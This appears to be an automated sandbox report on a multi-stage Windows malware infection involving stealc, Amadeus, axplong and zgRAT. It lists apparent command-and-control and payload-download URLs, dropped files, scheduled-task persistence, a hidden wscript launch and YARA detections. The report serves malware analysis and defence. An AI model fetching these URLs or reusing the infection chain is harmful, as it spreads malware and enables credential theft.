Source: Amadeus.exe, 00000025.00000003.3195176042.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachmtachmq15
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000003.2896996473.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cgil.in/A
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cgil.in/c
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cgil.in/storage/openvpn12.exe
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cgil.in/storage/openvpn12.exe-
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cgil.in/storage/openvpn12.exeW
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000003.2896996473.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000003.2896996473.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: stealc_default2.exe, 00000014.00000002.3053810297.0000000027B00000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: stealc_default2.exe, 00000014.00000002.3053810297.0000000027B00000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: pLAZbVgk7u.exe, 0000000D.00000002.2741839920.00000000026C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000003.2896996473.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000003.2896996473.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000003.2896996473.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BitLockerToGo.exe, 0000002C.00000002.3341356225.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3266901207.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://evoliutwoqm.shop/api
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: BitcoinCore.exe, 00000017.00000003.3166046170.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BitcoinCore.exe, 00000017.00000002.3186685688.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jirafasaltas.fun/
Source: BitcoinCore.exe, 00000017.00000002.3202316465.0000000002CC7000.00000004.00001000.00020000.00000000.sdmp, BitcoinCore.exe, 00000017.00000002.3186685688.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, BitcoinCore.exe, 00000017.00000003.3166046170.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BitcoinCore.exe, 00000017.00000003.3164769519.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, BitcoinCore.exe, 00000017.00000002.3186685688.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, BitcoinCore.exe, 00000017.00000002.3202316465.0000000002CD3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://jirafasaltas.fun/shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpaAXHa
Source: BitcoinCore.exe, 00000017.00000003.3166046170.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BitcoinCore.exe, 00000017.00000002.3186685688.0000000000F21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jirafasaltas.fun:443/shopexd.asp?bz6lc4t394br=eFhwIFemrMF%2FVQdnWgR2UbCKGWfZtBWZRJvXMMLoeVpa
Source: BitLockerToGo.exe, 00000016.00000003.2982516749.0000000003275000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000002.3341356225.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/
Source: BitLockerToGo.exe, 0000002C.00000003.3266901207.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/U
Source: BitLockerToGo.exe, 00000016.00000003.2982516749.0000000003275000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3266901207.0000000002AAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/api
Source: BitLockerToGo.exe, 00000016.00000003.2982516749.0000000003275000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/api3
Source: BitLockerToGo.exe, 0000002C.00000003.3266901207.0000000002AAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://locatedblsoqp.shop/apibk
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nel.heroku.com/reports?ts=1725111878&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=HwATLp66HgP%
Source: caesium-image-compressor.exe, 00000015.00000000.2862339982.000000000104F000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictnot
Source: stealc_default2.exe, 00000014.00000003.3004078377.000000002DD5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: stealc_default2.exe, 00000014.00000003.3004078377.000000002DD5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: Amadeus.exe, 00000025.00000002.3381015280.0000000003470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/
Source: Amadeus.exe, 00000025.00000002.3381015280.0000000003470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/12041962/gh941.bat
Source: Amadeus.exe, 00000025.00000002.3381015280.0000000003470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/12041962/gh941.bat)
Source: Amadeus.exe, 00000025.00000002.3381015280.0000000003470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/12041962/gh941.batbec
Source: BitLockerToGo.exe, 00000016.00000003.2982516749.0000000003275000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000002.3341356225.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3267131690.0000000002AE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3266547075.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/
Source: BitLockerToGo.exe, 0000002C.00000003.3267131690.0000000002AE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3266547075.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/2
Source: BitLockerToGo.exe, 00000016.00000002.3001288406.0000000003232000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/C
Source: BitLockerToGo.exe, 00000016.00000003.2982516749.0000000003275000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/P&
Source: BitLockerToGo.exe, 0000002C.00000002.3341356225.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/Y
Source: BitLockerToGo.exe, 00000016.00000002.3001288406.0000000003232000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000016.00000003.2982516749.0000000003275000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000002.3341356225.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000002.3341356225.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3267131690.0000000002AE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3266547075.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/api
Source: BitLockerToGo.exe, 00000016.00000002.3001288406.0000000003251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/api%
Source: BitLockerToGo.exe, 0000002C.00000002.3341356225.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/api6C
Source: BitLockerToGo.exe, 0000002C.00000003.3267131690.0000000002AE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3266547075.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/apiF
Source: BitLockerToGo.exe, 0000002C.00000003.3266901207.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/apiix
Source: BitLockerToGo.exe, 00000016.00000002.3001288406.0000000003232000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/apim:b
Source: BitLockerToGo.exe, 0000002C.00000002.3341356225.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop:443/api
Source: BitLockerToGo.exe, 0000002C.00000003.3266547075.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop:443/apient-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-Encoding
Source: stealc_default2.exe, 00000014.00000002.3053810297.0000000027B00000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: Shipment.pif, 00000023.00000002.3381025313.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Shipment.pif, 00000023.00000003.3185890062.000000000387F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: stealc_default2.exe, 00000014.00000002.3053810297.0000000027B00000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3033783708.0000000001768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: BitLockerToGo.exe, 00000016.00000002.3001288406.0000000003251000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3266148902.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3266547075.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000016.00000002.3001288406.0000000003251000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3267131690.0000000002AE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3266547075.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000003.2896996473.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.entrust.net/rpa0
Source: Shipment.pif, 00000023.00000003.3185890062.000000000387F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Shipment.pif, 00000023.00000002.3381025313.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Shipment.pif, 00000023.00000003.3185890062.000000000387F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.00000000040FB000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000003.2896996473.0000000001728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: stealc_default2.exe, 00000014.00000002.3032875180.0000000000D1C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: stealc_default2.exe, 00000014.00000003.3004078377.000000002DD5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: stealc_default2.exe, 00000014.00000002.3032875180.0000000000D1C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: stealc_default2.exe, 00000014.00000003.3004078377.000000002DD5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: stealc_default2.exe, 00000014.00000002.3032875180.0000000000D1C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: stealc_default2.exe, 00000014.00000003.3004078377.000000002DD5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: stealc_default2.exe, 00000014.00000002.3032875180.0000000000D1C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: stealc_default2.exe, 00000014.00000002.3032875180.0000000000D1C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: stealc_default2.exe, 00000014.00000003.3004078377.000000002DD5F000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3032875180.0000000000D1C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: stealc_default2.exe, 00000014.00000003.3004078377.000000002DD5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: stealc_default2.exe, 00000014.00000002.3032875180.0000000000D1C000.00000004.00000001.01000000.00000015.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: stealc_default2.exe, 00000014.00000003.3004078377.000000002DD5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.57.172.44:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49769 version: TLS 1.2

Source: pLAZbVgk7u.exe, 0000000D.00000002.2741839920.00000000027E9000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_e94da236-d

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\TmpDE13.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File created: C:\Users\user\AppData\Local\Temp\TmpEAD5.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\TmpDE33.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	File created: C:\Users\user\AppData\Local\Temp\TmpEAC5.tmp	Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\crypteda[1].exe entropy: 7.99818162851	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe entropy: 7.99818162851	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Users\user\AppData\Local\Temp\Competent entropy: 7.99811049854	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Users\user\AppData\Local\Temp\Whom entropy: 7.99734780297	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Users\user\AppData\Local\Temp\Reveal entropy: 7.99789640851	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Users\user\AppData\Local\Temp\Corporate entropy: 7.99704915594	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Users\user\AppData\Local\Temp\Screw entropy: 7.99717752647	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Users\user\AppData\Local\Temp\Still entropy: 7.9977069634	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Users\user\AppData\Local\Temp\Wireless entropy: 7.9965436862	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Users\user\AppData\Local\Temp\Entrepreneurs entropy: 7.99797398135	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Users\user\AppData\Local\Temp\Greatest entropy: 7.99794017652	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Users\user\AppData\Local\Temp\Provides entropy: 7.99760816884	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\591950\E entropy: 7.99975204156	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\TrackGuard Technologies\z entropy: 7.99975204156	Jump to dropped file
Source: C:\Users\user\1000238002\Amadeus.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\setup[1].exe entropy: 7.99692059813	Jump to dropped file
Source: C:\Users\user\1000238002\Amadeus.exe	File created: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe entropy: 7.99692059813	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe	File created: C:\Users\user\AppData\Local\Temp\7zSC5C3.tmp\__data__\config.txt entropy: 7.99979640223	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe	File created: C:\Users\user\AppData\Local\Temp\7zSC5C3.tmp\Install.exe entropy: 7.99614815064	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.RegAsm.exe.482060.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 13.0.pLAZbVgk7u.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 12.2.RegAsm.exe.482060.1.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000015.00000002.2975464614.0000000001C7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000018.00000002.3370673324.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000015.00000002.2975464614.0000000001B4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: crypted[1].exe.6.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296
Source: crypted.exe.6.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296

PE file contains section with special chars

Source: OmnqazpM3P.exe	Static PE information: section name:
Source: OmnqazpM3P.exe	Static PE information: section name: .idata
Source: OmnqazpM3P.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

PE file has a writeable .text section

Source: stealc_default2[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stealc_default2.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"

Source: C:\Users\user\Desktop\OmnqazpM3P.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File created: C:\Windows\Tasks\Hkbsse.job
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Windows\ProjectionAcademy
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Windows\ChipSeems
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Windows\LaboratoriesFriend
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Windows\ConditionSuperintendent
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Windows\AyePercent
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	File created: C:\Windows\CuDefense

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_002A522B	3_1_002A522B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00234E33	3_1_00234E33
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00267A60	3_1_00267A60
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00243E4A	3_1_00243E4A
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001E2266	3_1_001E2266
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_002642F8	3_1_002642F8
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_002508D9	3_1_002508D9
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_0025CD0C	3_1_0025CD0C
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001DCB57	3_1_001DCB57
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_002A8761	3_1_002A8761
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00280153	3_1_00280153
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001DCB8B	3_1_001DCB8B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00218794	3_1_00218794
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001DCBE1	3_1_001DCBE1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_0017E440	6_2_0017E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_001B3068	6_2_001B3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00174CF0	6_2_00174CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_001A7D83	6_2_001A7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_001B765B	6_2_001B765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00174AF0	6_2_00174AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_001B6F09	6_2_001B6F09
